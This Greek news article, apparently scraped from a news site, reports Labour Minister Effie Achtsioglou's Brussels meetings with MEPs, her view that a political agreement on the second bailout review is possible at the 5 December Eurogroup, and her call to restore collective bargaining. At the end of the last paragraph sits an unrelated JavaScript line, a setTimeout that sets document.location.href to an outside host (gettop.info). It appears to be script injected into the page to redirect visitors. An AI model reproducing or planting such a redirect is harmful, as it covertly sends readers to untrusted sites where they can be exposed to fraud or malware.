Αχτσιόγλου: Μπορεί να υπάρξει πολιτική συμφωνία για τη β’ αξιολόγηση

0
4

 

Στις Βρυξέλλες βρίσκεται από χθες η υπουργός Εργασίας Έφη Αχτσιόγλου η οποία είχε επαφές με ευρωβουλευτές και υψηλόβαθμους εκπροσώπους του Ευρωπαϊκού Κοινοβουλίου, ενημερώνοντας για τις ελληνικές θέσεις σχετικά με τα εργασιακά ζητήματα.
Σε «πολιτική συμφωνία» – για το σύνολο των ζητημάτων της β’ αξιολόγησης – παρέπεμψε η υπουργός Εργασίας κατά τη διάρκεια επαφών που είχε.

Αναφερόμενη στο επικείμενο Εurogroup της 5ης Δεκεμβρίου σε δηλώσεις της στο ΑΜΠΕ, η κα Αχτσιόγλου ανέφερε χαρακτηριστικά ότι μπορεί να υπάρξει μία «επί της αρχής» πολιτική συμφωνία για το σύνολο των ζητημάτων της β’ αξιολόγησης.

Εκτίμησε δε, ότι στο Eurogroup κομβικό ρόλο θα έχει η συζήτηση για τα εργασιακά, ακριβώς επειδή είναι ένα «βαθιά πολιτικό θέμα», το οποίο δεν μπορεί να λυθεί σε επίπεδο τεχνικής διαπραγμάτευσης.

Η υπουργός εξέφρασε εκ νέου την ανάγκη επαναφοράς των συλλογικών διαπραγματεύσεων στην Ελλάδα. Σημείωσε ότι ολοκληρώθηκε ένας κύκλος επαφών στο Ευρωπαϊκό Κοινοβούλιο, με σημαντικούς εκπροσώπους, για το ζήτημα των συλλογικών εργασιακών σχέσεων στην Ελλάδα.

«Μεταφέραμε τις θέσεις της ελληνικής κυβέρνησης για την ανάγκη επαναφοράς των συλλογικών διαπραγματεύσεων στη χώρα. Στο σύνολό τους, τα μέλη του Ευρωπαϊκού Κοινοβουλίου με τα οποία συναντήθηκα υποστηρίζουν θερμά τις θέσεις της ελληνικής κυβέρνησης για την επαναφορά της χώρας σε αυτό που αποτελεί το ευρωπαϊκό κεκτημένο στα εργασιακά δικαιώματα» δήλωσε η κ. Αχτσιόγλου.

Σύμφωνα με την υπουργό, τα μέλη του ΕΚ υποστήριξαν ότι η Ελλάδα δεν θα πρέπει να βρίσκεται σε κατάσταση εξαίρεσης από το ευρωπαϊκό κοινωνικό μοντέλο, επειδή είναι σε πρόγραμμα δημοσιονομικής προσαρμογής και η Ευρώπη δεν θα πρέπει να επιτρέψει μία τέτοια εξαίρεση της Ελλάδας από το ευρωπαϊκό κοινωνικό μοντέλο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here